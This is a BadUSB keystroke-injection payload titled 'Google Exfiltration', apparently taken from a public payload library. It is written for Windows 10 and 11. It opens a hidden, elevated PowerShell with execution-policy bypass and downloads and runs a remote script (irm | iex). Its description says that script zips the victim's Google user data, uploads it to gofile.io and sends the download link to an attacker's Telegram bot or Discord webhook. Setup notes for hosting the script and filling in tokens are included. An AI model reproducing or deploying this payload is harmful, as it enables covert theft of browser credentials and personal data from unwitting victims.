Path: blob/master/payloads/library/exfiltration/Google-Exfil/payload.txt
2968 views
REM Title: Google Exfiltration1REM Author: mrproxy2REM Description: This payload runs powershell script that zip google user data, uses gofile.io api to upload it, and then sends download link through telegram bot or discord webhook.3REM Target: Windows 10, 114REM Version: 1.05REM Category: Exfiltration6REM Source: https://github.com/Mr-Proxy-source/BadUSB-Payloads78REM Remember you will have to host the powershell script yourself on any file sharing service (it has to be direct download link)9REM If you are using DropBox, just remember to change it from ?dl=0 top ?dl=110DEFINE #SCRIPT_URL example.com/payload.ps1?dl=11112REM If you want to use discord webhook instead of telegram bot, just change DC_WEBHOOK1314REM Telegram bot details15DEFINE #BOT_TOKEN your-bot-token16DEFINE #CHAT_ID your-chat-id1718REM Discord webhook19DEFINE #DC_WEBHOOK your-webhook2021DELAY 150022GUI r23DELAY 50024REM If you want to use Telegram change just bot token and chat id25REM If you want to use Discord Webhook dont do anything with botToken and chatID just change $webhook26STRING powershell -w h -NoP -Ep Bypass -Command $botToken='#BOT_TOKEN'; $chatID='#CHAT_ID'; $webhook='#DC_WEBHOOK'; irm #SCRIPT_URL | iex27CTRL-SHIFT ENTER28DELAY 100029ALT y303132